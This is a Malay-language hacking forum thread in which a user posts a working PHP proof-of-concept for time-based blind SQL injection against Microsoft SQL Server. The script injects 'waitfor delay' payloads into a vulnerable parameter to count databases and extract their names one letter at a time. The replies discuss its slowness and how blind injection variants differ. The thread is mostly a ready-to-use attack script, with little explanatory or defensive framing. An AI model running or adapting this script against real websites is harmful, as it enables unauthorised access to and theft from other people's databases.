Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[SRC] Web Blind SQL Injection (Time Based) POC
04-01-2011, 11:28 AM, (This post was last modified: 04-01-2011, 02:11 PM by fatah.)
Post: #1
[SRC] Web Blind SQL Injection (Time Based) POC
Aku rasa ramai dah tahu pasal benda ni. Tapi aku saja nak berkongsi dengan korang. Aku tgk Havij bermasalah dan aku pun baru nak belajar benda ni semalam dan terus cuba pada satu legal test site.

Code:
<?php

    $site = "http://www.site.com";
    $path = "/path/to/vuln/page.asp?";
    $param = "param1=Submit&param2=&vulnparam=";

    $timing = 5;
    
    // Initialization
    $length = 0;
    $dbcount = 0;

    echo "Web Blind (Time Based) SQL Injection POC\n";
    echo "by Sesiapa sahaja [at] TBD.My\n\n";

    foreach(range(0,50) as $n) {
        $inject = "';if (select COUNT(*) from master..sysdatabases) = {$n} waitfor delay '0:0:{$timing}';--";
        $inject = urlencode($inject);

        $url = $site . $path . $param . $inject;

        $time1 = time();
        $body = @file_get_contents($url);
        $time2 = time();

        if (($time2 - $time1) < $timing) {
            //echo "false";
        } else {
            $dbcount = $n; break;
        }
    }

    echo "DB count = {$dbcount}\n";

    foreach(range(0,$dbcount) as $n) {
        foreach(range(0,50) as $i) {
            $inject = "';if (select len(db_name($n))) = {$i} waitfor delay '0:0:{$timing}';--";
            $inject = urlencode($inject);

            $url = $site . $path . $param . $inject;

            $time1 = time();
            $body = @file_get_contents($url);
            $time2 = time();

            if (($time2 - $time1) < $timing) {
                //echo "false";
            } else {
                $length = $i; break;
            }
        }

        echo "db_name({$n}) length={$length}\n";

        foreach(range(1,$length) as $index) {
            foreach(range('a','z') as $letter) {
                $inject = "';if (select substring(lower(db_name($n)),$index,1)) = '{$letter}' waitfor delay '0:0:{$timing}';--";
                $inject = urlencode($inject);

                $url = $site . $path . $param . $inject;

                $time1 = time();
                $body = @file_get_contents($url);
                $time2 = time();

                if (($time2 - $time1) < $timing) {
                    //echo "false";
                } else {
                    echo "{$letter}"; break;
                }
            }
        }

        echo "\n"; // newline
    }
?>
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply
04-01-2011, 05:51 PM,
Post: #2
RE: [SRC] Web Blind SQL Injection (Time Based) POC
huhu ............ mssqli kan ?? tapi nak jalan sampai bile ni kalo guna file_get_contents() ROFL ROFL ROFL ............... kalo ko pernah try hexjector lama mesti ko tau ROFL ROFL ROFL ROFL ROFL
Reply
04-01-2011, 06:39 PM, (This post was last modified: 04-01-2011, 08:07 PM by fatah.)
Post: #3
RE: [SRC] Web Blind SQL Injection (Time Based) POC
Big Grin Yeah, MSSQLi dan parameter jenis String.

Aku buat benda ni pun one time pakai je. Yang aku tahu blind sqli ada dua jenis serangan:
1. True & False - Lebih laju. (Oleh kerana sentiasa 500, aku tak leh pakai teknik ni).
2. Time Based - Lambat dan bermasalah jika connection semput.

file_get_contents() pasal benda first terlintas, dan end result page sentiasa 500 Internal Server Error, at least sql statement "waitfor delay" execute juga. GayFace
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [PHP] Download Time Left Function shahril 0 268 30-06-2013, 07:51 PM
Last Post: shahril
  SQL Injection Scanner [Version PHP] XShimeX 26 4,491 15-10-2010, 05:06 AM
Last Post: setan
  Source Sql injection scanner wanbotak 14 2,931 15-10-2010, 04:51 AM
Last Post: setan
  SQL Injection SCANER Dalam PHP Or HTML darkkroit 2 954 18-01-2010, 05:44 PM
Last Post: mrlock
  [Video] PHP Tutorials: SQL Injection MarsHmalloW 0 575 27-12-2009, 01:54 PM
Last Post: MarsHmalloW

Forum Jump: